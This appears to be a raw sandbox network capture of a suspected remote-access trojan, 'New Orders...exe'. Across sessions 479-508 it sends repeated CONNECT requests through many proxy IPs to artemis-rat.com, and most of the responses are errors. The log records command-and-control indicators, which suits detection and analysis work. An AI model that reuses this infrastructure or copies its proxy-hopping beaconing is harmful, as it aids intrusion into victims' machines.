                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        479192.168.2.95142191.134.140.160122177672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.868386030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        480192.168.2.95137272.195.114.16941457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.868748903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        481192.168.2.951459185.162.230.178807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.869235992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.023545027 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        482192.168.2.95157346.22.210.1844437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.869365931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        483192.168.2.951461185.162.231.226807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.869406939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.023621082 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        484192.168.2.95135427.0.234.20610807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.870086908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        485192.168.2.951469104.16.109.213807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.870090008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.024552107 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        486192.168.2.951474172.67.3.108807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.870193005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.025058985 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        487192.168.2.951472172.67.219.60807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.870197058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.024833918 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        488192.168.2.951352202.179.184.4454307672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.870918036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        489192.168.2.951368152.32.130.117180807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.871634960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        490192.168.2.951348185.132.242.21280837672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.884557009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        491192.168.2.950538199.102.107.14541457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.885587931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        492192.168.2.951350186.124.164.213807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.887135029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        493192.168.2.95141845.196.151.13454327672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.887495995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.104351044 CET308INHTTP/1.1 407 Proxy Authentication Required
                                                                                        Server: FaaS v1.3-20220203-7fa38bd5af
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                        Content-Length: 65
                                                                                        Proxy-Authenticate: Basic realm="Proxy"
                                                                                        Connection: close
                                                                                        Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64
                                                                                        Data Ascii: HTTP authorization error: ip auth failed, no credentials provided


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        494192.168.2.951382121.159.146.251807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.887499094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        495192.168.2.951377211.222.252.18781937672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.887624979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        496192.168.2.95159446.22.210.1844437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.887876034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        497192.168.2.951369193.239.56.8480817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.888770103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        498192.168.2.95160546.22.210.1844437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.890223026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        499192.168.2.95142766.45.246.19488887672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.890985012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.111805916 CET327INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 166
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        500192.168.2.95160646.22.210.1844437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.891351938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        501192.168.2.950766165.16.67.23880807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.898608923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.961172104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.977170944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.070229053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:06.164813042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:09.808533907 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        502192.168.2.95137979.110.196.14580817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.902846098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        503192.168.2.950782123.110.158.236807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.903021097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        504192.168.2.95138191.148.127.16280807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.909512997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        505192.168.2.951380212.31.100.13841537672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.911824942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.601180077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        506192.168.2.95137049.228.131.16950007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.913438082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.269633055 CET340INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.12.2
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Content-Length: 173
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        507192.168.2.95137491.241.217.5890907672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.926093102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        508192.168.2.95137891.202.230.21980807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.928843021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
